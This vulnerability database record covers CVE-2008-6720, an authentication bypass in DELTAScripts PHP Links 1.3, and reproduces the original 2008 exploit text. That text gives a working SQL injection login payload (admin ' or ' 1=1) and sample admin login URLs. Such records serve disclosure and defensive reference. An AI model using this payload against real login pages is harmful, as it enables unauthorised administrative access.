Details of VAR-E-200811-0117

ID

VAR-E-200811-0117

CVE

cve_id:

CVE-2008-6720

Trust: 1.9

sources: BID: 32163 // EXPLOIT-DB: 7024 // EDBNET: 31289

EDB ID

7024

TITLE

DELTAScripts PHP Links 1.3 - Authentication Bypass - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 7024

DESCRIPTION

DELTAScripts PHP Links 1.3 - Authentication Bypass. CVE-53672CVE-2008-6720 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 7024

AFFECTED PRODUCTS

vendor:	deltascripts	model:	php links	scope:	eq	version:	1.3	Trust: 1.3
vendor:	deltascripts	model:	php links	scope:	lte	version:	<=1.3	Trust: 0.6

sources: BID: 32163 // EXPLOIT-DB: 7024 // EDBNET: 31289

EXPLOIT

[~] deltascripts phplinks Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin

admin login for demo:

http://localhost/classifieds/admin/login.php

example for demo:

admin: admin ' or ' 1=1

passwd: ZoRLu

example 2:

admin login:

http://localhost/anunturi/admin/login.php

admin: admin ' or ' 1=1

passwd: ZoRLu

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-06]

Trust: 1.0

sources: EXPLOIT-DB: 7024

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 7024

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 7024

TYPE

Authentication Bypass

Trust: 1.0

sources: EXPLOIT-DB: 7024

CREDITS

ZoRLu

Trust: 0.6

sources: EXPLOIT-DB: 7024

EXTERNAL IDS

db:	NVD	id:	CVE-2008-6720	Trust: 1.9
db:	EXPLOIT-DB	id:	7024	Trust: 1.6
db:	EDBNET	id:	31289	Trust: 0.6
db:	BID	id:	32163	Trust: 0.3

sources: BID: 32163 // EXPLOIT-DB: 7024 // EDBNET: 31289

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2008-6720	Trust: 1.6
url:	https://www.exploit-db.com/exploits/7024/	Trust: 0.6
url:	http://www.deltascripts.com/phplinks	Trust: 0.3

sources: BID: 32163 // EXPLOIT-DB: 7024 // EDBNET: 31289

SOURCES

db:	BID	id:	32163
db:	EXPLOIT-DB	id:	7024
db:	EDBNET	id:	31289

LAST UPDATE DATE

2022-07-27T09:20:15.409000+00:00

SOURCES UPDATE DATE

db:

BID

id:

32163

date:

2015-04-16T17:51:00

SOURCES RELEASE DATE

db:	BID	id:	32163	date:	2008-11-06T00:00:00
db:	EXPLOIT-DB	id:	7024	date:	2008-11-06T00:00:00
db:	EDBNET	id:	31289	date:	2008-11-06T00:00:00